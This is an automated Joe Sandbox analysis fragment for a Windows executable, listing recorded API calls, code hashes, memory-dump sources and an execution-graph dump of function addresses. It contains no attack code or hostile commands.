                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadSizeof
                                        • String ID: lB
                                        • API String ID: 507330600-3702596448
                                        • Opcode ID: edf130433116dfd7c93db7e85d3f1517815cee4d5f8ab569f922270cbb5b81ab
                                        • Instruction ID: 6d28ba78a0d218b081487b1e7dd037222f4673f4e98f5ffc71b2acd0128368f3
                                        • Opcode Fuzzy Hash: edf130433116dfd7c93db7e85d3f1517815cee4d5f8ab569f922270cbb5b81ab
                                        • Instruction Fuzzy Hash: C5F01730508301AFC705EF20CE45A1ABAE5FB98B05F008C3EB5886A1A0D3759D14EB4A
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,00000006), ref: 00404E99
                                        • DestroyAcceleratorTable.USER32(?), ref: 00404F07
                                        • CreateAcceleratorTableA.USER32(?,?,?), ref: 00404F13
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AcceleratorTable$AllocateCreateDestroyHeap
                                        • String ID:
                                        • API String ID: 1846328917-0
                                        • Opcode ID: 6d5d5c72cacb5ceb41d0a126b86641f2415a59e02c6a290ff14f8ae474ad7ed6
                                        • Instruction ID: bc9dcee14bbf4dd975b3e87a1cfaf1458909dabdc56a66c9757580d18e599811
                                        • Opcode Fuzzy Hash: 6d5d5c72cacb5ceb41d0a126b86641f2415a59e02c6a290ff14f8ae474ad7ed6
                                        • Instruction Fuzzy Hash: E8319E70100702DBC724CF24CA45A6ABBF5FF94704F10C82DE96AAB6A0E375EA50DB48
                                        APIs
                                        • strlen.MSVCRT ref: 00407665
                                        • RtlAllocateHeap.NTDLL(00A30000,00000001,-00000005), ref: 00407687
                                        • RtlReAllocateHeap.NTDLL(00A30000,00000001,?,-00000005), ref: 004076AA
                                        • HeapFree.KERNEL32(00A30000,00000001), ref: 004076E0
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Heap$Allocate$Freestrlen
                                        • String ID:
                                        • API String ID: 3543670626-0
                                        • Opcode ID: 00b5e7f4474d1610928f4fd92f534d406abcc27283626e612fe652c0a87dc2ac
                                        • Instruction ID: 9a70041e5ee9e3aa3c8356125c7a9a49bf0f5e47ff7a9399fb27335f50f92b23
                                        • Opcode Fuzzy Hash: 00b5e7f4474d1610928f4fd92f534d406abcc27283626e612fe652c0a87dc2ac
                                        • Instruction Fuzzy Hash: F0215EB4A00208EFCB00CF58C984FAA37B5EF88314F20C469F8059B395D776AE41DB99
                                        APIs
                                        • IsWindowEnabled.USER32(?), ref: 00405C24
                                        • IsWindowVisible.USER32(?), ref: 00405C2F
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00405C3C
                                        • SetFocus.USER32(?), ref: 00405C5A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$EnabledFocusLongVisible
                                        • String ID:
                                        • API String ID: 599048109-0
                                        • Opcode ID: cb1c87f19132670d348f43589caefb14191d0db9c4e993ae8d8c67d75e8ba143
                                        • Instruction ID: 9b191372e45709e83f1cce7d42dee75ff49b7deadfcab72b6d2fd196ff601546
                                        • Opcode Fuzzy Hash: cb1c87f19132670d348f43589caefb14191d0db9c4e993ae8d8c67d75e8ba143
                                        • Instruction Fuzzy Hash: 04F0DA752087019BE7209F36DE8CA57B7ACFB94751718843AB496E3290CB38D851CA69
                                        APIs
                                        • GetWindowLongA.USER32(?,000000F0), ref: 004051AB
                                        • GetParent.USER32(?), ref: 004051C1
                                        • MapWindowPoints.USER32(00000000,00000000), ref: 004051CA
                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004051E9
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$LongMoveParentPoints
                                        • String ID:
                                        • API String ID: 473562985-0
                                        • Opcode ID: fab0eefbd949c8aa4791b99baa1f4904001a3ff5d6ae233363cc4ff1c4dfdd85
                                        • Instruction ID: 050705d4d46781d10eeea3c7f9e2e02fa34a3de8c5ebb1e511241672335786dd
                                        • Opcode Fuzzy Hash: fab0eefbd949c8aa4791b99baa1f4904001a3ff5d6ae233363cc4ff1c4dfdd85
                                        • Instruction Fuzzy Hash: 4EF07472140209BFDF019F98DD49FAA3B69FB08751F00C125BE19AA1A0C771D9619B55
                                        APIs
                                        • memset.MSVCRT ref: 004041F9
                                        • CreateWindowExA.USER32(?,Static,00000000,?,?,?,?,?,00000000,000000FF,00000000), ref: 00404285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateWindowmemset
                                        • String ID: Static
                                        • API String ID: 1730425660-2272013587
                                        • Opcode ID: a183efbfaf25bebbc042af10ac3eb9652dafe14b9b7bbd77ffa2e887317b7bbd
                                        • Instruction ID: da57442342e235b20ab9d9cc299fb314f46126ddfb0dd979976cb01a117c754a
                                        • Opcode Fuzzy Hash: a183efbfaf25bebbc042af10ac3eb9652dafe14b9b7bbd77ffa2e887317b7bbd
                                        • Instruction Fuzzy Hash: D7215BB1500205AFDB115F51ED09F5B3F69EB85364F00823AFA247A2E1C3BA8921DBDC
                                        APIs
                                        • memset.MSVCRT ref: 0040451C
                                        • CreateWindowExA.USER32(00000000,Button,?,?,?,?,?,?,?,000000FF,00000000), ref: 00404583
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateWindowmemset
                                        • String ID: Button
                                        • API String ID: 1730425660-1034594571
                                        • Opcode ID: 010baa73ad986994c1f3d44621661aa9df68acf71dbd6cab57f37a79d6a076ba
                                        • Instruction ID: c03ed1e6e3b39e81b365a7cda6e144c566f8838bc6f058065528baead89b727a
                                        • Opcode Fuzzy Hash: 010baa73ad986994c1f3d44621661aa9df68acf71dbd6cab57f37a79d6a076ba
                                        • Instruction Fuzzy Hash: DF118EB2400119BFCB119F55DE45DAB3FB8EB48358B10403AFA15B62A1D3798D20DBEC
                                        APIs
                                        • GetPropA.USER32(00000000,PB_ID), ref: 0040563D
                                        • GetWindowLongA.USER32(00000000,000000F4), ref: 0040564A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: LongPropWindow
                                        • String ID: PB_ID
                                        • API String ID: 2492497586-4173770792
                                        • Opcode ID: 69a740be24c28eba4c03775af690aa08edf4449696e8d17c58a7346d2cbb1dd2
                                        • Instruction ID: dcde74696da6f989fa088eeb670c0edb8cd62ec8937a9ae86c05ee9430180859
                                        • Opcode Fuzzy Hash: 69a740be24c28eba4c03775af690aa08edf4449696e8d17c58a7346d2cbb1dd2
                                        • Instruction Fuzzy Hash: C3F06232100208ABCF115F64DD08E6B7BAAEB54350B44443AFD0DB22A0C736CC61DB98
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ParentProp
                                        • String ID: PB_WindowID
                                        • API String ID: 919147419-1508741625
                                        • Opcode ID: 56451676a8244703e2aa9ad7ec794e987ab7873823adb8b3af72ac0c5334d140
                                        • Instruction ID: eb09f32ff92d9ce12a6399f95510d521de9387f6d8f05edb00c370aed95cd547
                                        • Opcode Fuzzy Hash: 56451676a8244703e2aa9ad7ec794e987ab7873823adb8b3af72ac0c5334d140
                                        • Instruction Fuzzy Hash: 5CD0C2B770132167C221662A5C84E4796ACAAD8B60300C43BF701F3251C278CC0182E9

                                        Execution Graph

                                         Execution Coverage: 8.6%
                                         Dynamic/Decrypted Code Coverage: 0%
                                         Signature Coverage: 1.3%
                                         Total number of Nodes: 1651
                                         Total number of Limit Nodes: 16
execution_graph
4940->4942 4943 404176 wcscat 4940->4943 4941->4940 4942->4939 4944 40419b 4942->4944 4943->4942 4944->4914 4946 403de2 GetVersionExW 4945->4946 4947 403e0b 4946->4947 4947->4926 4947->4927 4949 409bf4 LoadLibraryW 4948->4949 4950 409c7d 4948->4950 4949->4950 4951 409c06 GetProcAddress 4949->4951 4950->4930 4952 409c1e GetProcAddress 4951->4952 4957 409c62 4951->4957 4954 409c2f GetProcAddress 4952->4954 4952->4957 4953 409c76 FreeLibrary 4953->4950 4955 409c40 GetProcAddress 4954->4955 4954->4957 4956 409c51 GetProcAddress 4955->4956 4955->4957 4956->4957 4957->4950 4957->4953 4959 409b6c GetModuleHandleW 4958->4959 4961 409bda 4958->4961 4960 409b7e GetProcAddress 4959->4960 4959->4961 4960->4961 4962 409b96 GetProcAddress 4960->4962 4961->4930 4962->4961 4963 409ba7 GetProcAddress 4962->4963 4963->4961 4964 409bb8 GetProcAddress 4963->4964 4964->4961 4965 409bc9 GetProcAddress 4964->4965 4965->4961 4967 409d75 4966->4967 4968 403e06 GetVersionExW 4967->4968 4969 409d83 4968->4969 4971 409d97 OpenProcess 4969->4971 4977 409ea8 4969->4977 4970 409a15 4970->4932 4970->4935 4971->4970 4979 409db2 4971->4979 4972 409f70 CloseHandle 4972->4970 4973 409dec memset memset 4973->4979 4974 409ef2 memset wcscpy 4975 409f85 memcpy 4974->4975 4975->4977 4977->4970 4977->4972 4977->4974 4979->4972 4979->4973 4980 409ea3 4979->4980 4981 409c7f 4979->4981 4997 409f85 4979->4997 4980->4972 4982 409c92 wcschr 4981->4982 4983 409c8f wcscpy 4981->4983 4982->4983 4985 409cb4 4982->4985 4995 409d60 4983->4995 4986 403a94 3 API calls 4985->4986 4987 409cc0 4986->4987 4988 409cca memset 4987->4988 4989 409d0c 4987->4989 5001 403e91 4988->5001 4991 409d12 memset 4989->4991 4992 409d57 wcscpy 4989->4992 4994 403e91 2 API calls 4991->4994 4992->4995 4993 409cef wcscpy wcscat 4993->4995 4996 409d37 memcpy wcscat 4994->4996 4995->4979 4996->4995 4998 409fc4 4997->4998 4999 409f95 4997->4999 4998->4979 4999->4998 5000 409fa3 memcpy 4999->5000 5000->4998 5002 403ea1 GetWindowsDirectoryW 
5001->5002 5003 403eb2 wcscpy 5001->5003 5002->5003 5003->4993 3813 40a715 3816 40a4ac 3813->3816 3815 40a735 3817 40a4b8 3816->3817 3818 40a4ca GetPrivateProfileIntW 3816->3818 3821 40a3b9 memset _itow WritePrivateProfileStringW 3817->3821 3818->3815 3820 40a4c5 3820->3815 3821->3820 5004 406c97 memset memset 5005 406ce1 5004->5005 5006 406327 2 API calls 5005->5006 5007 406ced _snwprintf 5006->5007 5010 403992 wcslen WriteFile 5007->5010 5009 406d15 5010->5009 5011 40109f 5012 4010b7 5011->5012 5013 40127c 5011->5013 5016 40123d 5012->5016 5017 4010be 5012->5017 5014 4012b2 SetDlgItemTextW 5013->5014 5015 401286 GetDlgItem ShowWindow GetDlgItem ShowWindow 5013->5015 5020 4012c5 SetWindowTextW SetDlgItemTextW SetDlgItemTextW 5014->5020 5015->5020 5025 40111f 5016->5025 5026 40125e EndDialog DeleteObject 5016->5026 5018 4010c7 5017->5018 5019 4011df GetDlgItem 5017->5019 5021 4010d2 5018->5021 5022 40115d GetDlgItem ChildWindowFromPoint 5018->5022 5023 4011f4 SetBkMode SetTextColor GetSysColorBrush 5019->5023 5024 40121a 5019->5024 5042 40103e 5020->5042 5021->5025 5028 4010da GetDlgItem ChildWindowFromPoint 5021->5028 5030 4011b0 5022->5030 5031 401193 GetModuleHandleW LoadCursorW SetCursor 5022->5031 5023->5025 5024->5025 5029 401228 GetDlgItem 5024->5029 5026->5013 5034 401129 5028->5034 5040 401110 5028->5040 5029->5025 5035 40123b 5029->5035 5030->5025 5036 4011be GetDlgItem ChildWindowFromPoint 5030->5036 5031->5025 5033 403ffe 5 API calls 5033->5025 5034->5025 5037 401137 GetDlgItem ChildWindowFromPoint 5034->5037 5035->5023 5036->5025 5038 4011dd 5036->5038 5037->5025 5037->5040 5038->5031 5041 4040a4 ShellExecuteW 5040->5041 5041->5025 5047 403d15 memset wcscpy 5042->5047 5044 401056 CreateFontIndirectW SendDlgItemMessageW 5045 401088 SendDlgItemMessageW 5044->5045 5046 40109c 5044->5046 5045->5046 5046->5033 5047->5044 5048 401ea0 5049 401fa5 5048->5049 5052 401eb3 5048->5052 5061 406ad7 5049->5061 5051 4045dc 7 API calls 5051->5052 5052->5051 5053 40459c 
free 5052->5053 5054 401e31 memset WideCharToMultiByte strlen WriteFile 5052->5054 5055 401f91 5052->5055 5053->5052 5054->5052 5058 401e31 5055->5058 5057 401f9e 5059 40b9f0 5058->5059 5060 401e3e memset WideCharToMultiByte strlen WriteFile 5059->5060 5060->5057 5062 406af8 5061->5062 5063 406aeb 5061->5063 5065 406b0c 5062->5065 5066 406afd 5062->5066 5082 406536 5063->5082 5068 406b11 5065->5068 5069 406b1e 5065->5069 5088 40641a 5066->5088 5098 406646 5068->5098 5071 406b32 5069->5071 5072 406b23 5069->5072 5073 406b46 5071->5073 5074 406b37 5071->5074 5106 4066c2 5072->5106 5078 406b58 5073->5078 5079 406b4b 5073->5079 5118 4067ea memset memset memset memset 5074->5118 5075 406af6 5075->5057 5078->5075 5154 406a28 5078->5154 5140 406583 5079->5140 5083 40656f 5082->5083 5087 40653e 5082->5087 5165 403992 wcslen WriteFile 5083->5165 5085 40657d 5085->5075 5086 403992 wcslen WriteFile 5086->5087 5087->5083 5087->5086 5089 406521 5088->5089 5096 40642f 5088->5096 5166 4063af 5089->5166 5091 40652f 5091->5075 5092 406444 wcschr 5093 406454 wcschr 5092->5093 5092->5096 5093->5096 5094 4045dc 7 API calls 5094->5096 5095 4063af memset WideCharToMultiByte strlen WriteFile 5095->5096 5096->5089 5096->5092 5096->5094 5096->5095 5097 40459c free 5096->5097 5097->5096 5099 406654 5098->5099 5100 4066ad 5098->5100 5099->5100 5101 406655 _snwprintf 5099->5101 5170 403992 wcslen WriteFile 5100->5170 5104 406687 _snwprintf 5101->5104 5103 4066bb 5103->5075 5169 403992 wcslen WriteFile 5104->5169 5171 403992 wcslen WriteFile 5106->5171 5108 4067d5 5195 403992 wcslen WriteFile 5108->5195 5110 4067e2 5110->5075 5113 40678b wcscat 5114 4066f9 5113->5114 5114->5108 5114->5113 5172 40abc0 _snwprintf 5114->5172 5173 40abf1 5114->5173 5179 40aceb memset memset 5114->5179 5119 406870 5118->5119 5120 4068a2 5119->5120 5197 40abc0 _snwprintf 5119->5197 5198 403992 wcslen WriteFile 5120->5198 5123 40688b _snwprintf 5123->5120 5124 406a05 5202 403992 wcslen WriteFile 5124->5202 5126 
406a12 5203 403992 wcslen WriteFile 5126->5203 5127 4068d9 wcscpy 5133 4068af 5127->5133 5129 406a1f 5129->5075 5131 40abf1 3 API calls 5131->5133 5132 40697c wcscpy 5132->5133 5133->5124 5133->5127 5133->5131 5133->5132 5135 40699e wcscat 5133->5135 5137 40aceb 13 API calls 5133->5137 5199 40abc0 _snwprintf 5133->5199 5200 40abc0 _snwprintf 5133->5200 5135->5133 5136 406962 _snwprintf 5136->5133 5138 4069b9 _snwprintf 5137->5138 5201 403992 wcslen WriteFile 5138->5201 5204 403992 wcslen WriteFile 5140->5204 5142 4065bf 5205 403992 wcslen WriteFile 5142->5205 5144 4065cd 5145 406617 5144->5145 5147 4065e6 _snwprintf 5144->5147 5207 403992 wcslen WriteFile 5145->5207 5206 403992 wcslen WriteFile 5147->5206 5148 40662b 5208 403992 wcslen WriteFile 5148->5208 5151 406634 5209 403992 wcslen WriteFile 5151->5209 5153 40663d 5153->5075 5210 403992 wcslen WriteFile 5154->5210 5156 406ac2 5212 403992 wcslen WriteFile 5156->5212 5158 406a49 memset 5160 406a3f 5158->5160 5159 406ad0 5159->5075 5160->5156 5160->5158 5161 40abf1 3 API calls 5160->5161 5162 406327 2 API calls 5160->5162 5161->5160 5163 406a95 _snwprintf 5162->5163 5211 403992 wcslen WriteFile 5163->5211 5165->5085 5167 40b9f0 5166->5167 5168 4063bc memset WideCharToMultiByte strlen WriteFile 5167->5168 5168->5091 5169->5099 5170->5103 5171->5114 5172->5114 5177 40abfb 5173->5177 5174 40ac6d memcpy 5174->5177 5175 40ac20 memcpy 5175->5177 5176 40ac8c 5176->5114 5177->5174 5177->5175 5177->5176 5178 40ac53 memcpy 5177->5178 5178->5177 5180 40ad37 5179->5180 5181 40add2 5180->5181 5182 40ad4e wcscpy 5180->5182 5185 40ade4 wcscat 5181->5185 5186 40add7 wcscat 5181->5186 5183 40ad62 _snwprintf wcscat 5182->5183 5184 40ad89 5182->5184 5183->5184 5187 40adc5 wcscat 5184->5187 5196 40abc0 _snwprintf 5184->5196 5188 40ae01 5185->5188 5189 40adf4 wcscat 5185->5189 5186->5185 5187->5181 5191 4067a6 _snwprintf 5188->5191 5192 40ae06 wcscat 5188->5192 5189->5188 5194 403992 wcslen WriteFile 5191->5194 5192->5191 5193 40ad9e 
_snwprintf wcscat 5193->5187 5194->5114 5195->5110 5196->5193 5197->5123 5198->5133 5199->5133 5200->5136 5201->5133 5202->5126 5203->5129 5204->5142 5205->5144 5206->5144 5207->5148 5208->5151 5209->5153 5210->5160 5211->5160 5212->5159 5213 404da0 5214 40b9f0 5213->5214 5215 404dad memset GetDlgCtrlID 5214->5215 5216 404ed1 5 API calls 5215->5216 5217 404de1 5216->5217 5218 404df7 5217->5218 5219 404de7 SetWindowTextW 5217->5219 5219->5218 5220 40a7a0 5221 40a4ac 4 API calls 5220->5221 5222 40a7ce 5221->5222 5223 40b923 _XcptFilter 5224 40b6a5 _onexit 5225 40132a 5228 403d88 5225->5228 5227 401331 5229 403d91 SetDlgItemTextW 5228->5229 5230 403da4 GetDlgItemTextW 5228->5230 5229->5227 5230->5227 5231 403230 5232 403245 5231->5232 5233 40325e 5232->5233 5234 40324f 5232->5234 5239 403bde SendDlgItemMessageW 5233->5239 5238 403bbd SendDlgItemMessageW 5234->5238 5237 40325b 5238->5237 5239->5237 5240 40ba30 5241 40b6ca 2 API calls 5240->5241 5242 40ba3a 5241->5242 5243 408432 DeleteFileW 5244 408150 37 API calls 5243->5244 5245 40844a 5244->5245 5248 408409 5245->5248 5249 408430 PostQuitMessage 5248->5249 5250 408414 5248->5250 5253 405808 5250->5253 5252 408429 ??3@YAXPAX 5252->5249 5254 4057a2 5 API calls 5253->5254 5255 405816 5254->5255 5256 405829 5255->5256 5257 40459c free 5255->5257 5258 40583c 5256->5258 5260 40459c free 5256->5260 5259 405822 ??3@YAXPAX 5257->5259 5261 40584f 5258->5261 5263 40459c free 5258->5263 5259->5256 5262 405835 ??3@YAXPAX 5260->5262 5265 40459c free 5261->5265 5267 405862 5261->5267 5262->5258 5264 405848 ??3@YAXPAX 5263->5264 5264->5261 5266 40585b ??3@YAXPAX 5265->5266 5266->5267 5268 405893 free 5267->5268 5268->5252 5269 401433 5270 401435 GetModuleHandleW CreateWindowExW 5269->5270 5271 40b6b3 __dllonexit 5272 4031b3 GetClientRect GetWindow GetWindow 5273 4031e9 5272->5273 5279 401584 GetWindowRect MapWindowPoints 5273->5279 5275 4031ee GetWindow 5275->5273 5276 4031f9 GetDlgItem 5275->5276 5280 40ab86 LoadLibraryW 
GetProcAddress 5276->5280 5278 403210 GetDlgItem SetFocus 5279->5275 5281 40abb4 FreeLibrary 5280->5281 5282 40aba7 5280->5282 5281->5278 5282->5281 5283 40b937 5284 40b943 _exit 5283->5284 5285 40b94a _c_exit 5283->5285 5284->5285 5286 40b950 5285->5286 5287 401fb7 5290 40b625 5287->5290 5301 403960 CreateFileW 5290->5301 5292 40b62f 5293 40b637 GetFileSize 5292->5293 5294 401fcc 5292->5294 5295 40b685 CloseHandle 5293->5295 5296 40b64b ??2@YAPAXI memset 5293->5296 5295->5294 5302 40427e ReadFile 5296->5302 5298 40b66b 5299 40b67d ??3@YAXPAX 5298->5299 5303 40b400 5298->5303 5299->5295 5301->5292 5302->5298 5313 40b41a 5303->5313 5304 40b614 5304->5299 5305 40b431 memchr 5305->5304 5305->5313 5306 40b4da memcpy memcpy 5314 4097c8 5306->5314 5309 4097c8 8 API calls 5309->5313 5310 40b587 memcpy 5310->5313 5311 40b5d2 memset 5319 40b211 5311->5319 5313->5304 5313->5305 5313->5306 5313->5310 5313->5311 5348 408fc0 5314->5348 5316 4097fe 5355 40905e 5316->5355 5318 409809 memcpy memcpy memcpy 5318->5309 5320 40b229 5319->5320 5321 40b21e 5319->5321 5322 403a94 3 API calls 5320->5322 5332 40b22f 5320->5332 5323 403a94 3 API calls 5321->5323 5324 40b251 5322->5324 5323->5320 5325 403a94 3 API calls 5324->5325 5326 40b25e 5325->5326 5327 40b323 5326->5327 5328 40b28c _wcsicmp 5326->5328 5329 40b328 5327->5329 5330 40b34d 5327->5330 5331 40b2a1 _wcsicmp 5328->5331 5328->5332 5329->5332 5340 403bfd 2 API calls 5329->5340 5334 40b370 5330->5334 5335 40b352 5330->5335 5331->5332 5333 40b2be 5331->5333 5332->5313 5336 403bfd 2 API calls 5333->5336 5338 40b393 5334->5338 5339 40b375 5334->5339 5337 403bfd 2 API calls 5335->5337 5346 40b2cf 5336->5346 5337->5346 5342 40b3bc 5338->5342 5343 40b398 5338->5343 5341 403bfd 2 API calls 5339->5341 5340->5346 5341->5346 5345 403bfd 2 API calls 5342->5345 5342->5346 5344 403bfd 2 API calls 5343->5344 5343->5346 5344->5346 5345->5346 5346->5332 5347 403bfd 2 API calls 5346->5347 5347->5332 5349 408fd7 5348->5349 5350 408ff7 memcpy 
5349->5350 5351 408ffe memcpy 5349->5351 5354 409015 5349->5354 5350->5316 5351->5354 5353 409024 memcpy 5353->5354 5354->5350 5354->5353 5356 409078 memset 5355->5356 5357 40909e memset 5355->5357 5362 4090dd 5356->5362 5359 4090ad 5357->5359 5361 4090c3 memcpy memset 5359->5361 5360 40908e memset 5360->5359 5361->5318 5362->5360 5366 406ebd 5367 406ec5 5366->5367 5368 406ecc 5366->5368 5369 4049df 16 API calls 5367->5369 5370 406eca 5369->5370 5371 40213d 5372 405b9a SendMessageW 5371->5372 5373 40215c 5372->5373 5374 403eeb modf 5373->5374 5375 402172 5374->5375 5376 40a73f 5379 40a406 5376->5379 5380 40a413 5379->5380 5381 40a432 memset 5380->5381 5382 40a465 memset GetPrivateProfileStringW 5380->5382 5387 4042bc 5381->5387 5391 404345 wcslen 5382->5391 5386 40a4a4 5389 404330 WritePrivateProfileStringW 5387->5389 5390 4042d0 5387->5390 5388 4042de _snwprintf memcpy 5388->5389 5388->5390 5389->5386 5390->5388 5390->5389 5392 404359 5391->5392 5393 40435b 5391->5393 5392->5386 5394 404391 wcstoul 5393->5394 5395 4043af 5393->5395 5394->5393 5395->5386

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004022B7: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004022D6
                                          • Part of subcall function 004022B7: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004022E8
                                          • Part of subcall function 004022B7: FreeLibrary.KERNEL32(00000000), ref: 004022FC
                                          • Part of subcall function 004022B7: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402327
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00408D5A
                                        • GetModuleHandleW.KERNEL32(00000000,0040A86C,00000000), ref: 00408D73
                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 00408D7A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,/deleteregkey,/savelangfile), ref: 00408E11
                                        • DeleteObject.GDI32(?), ref: 00408E2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
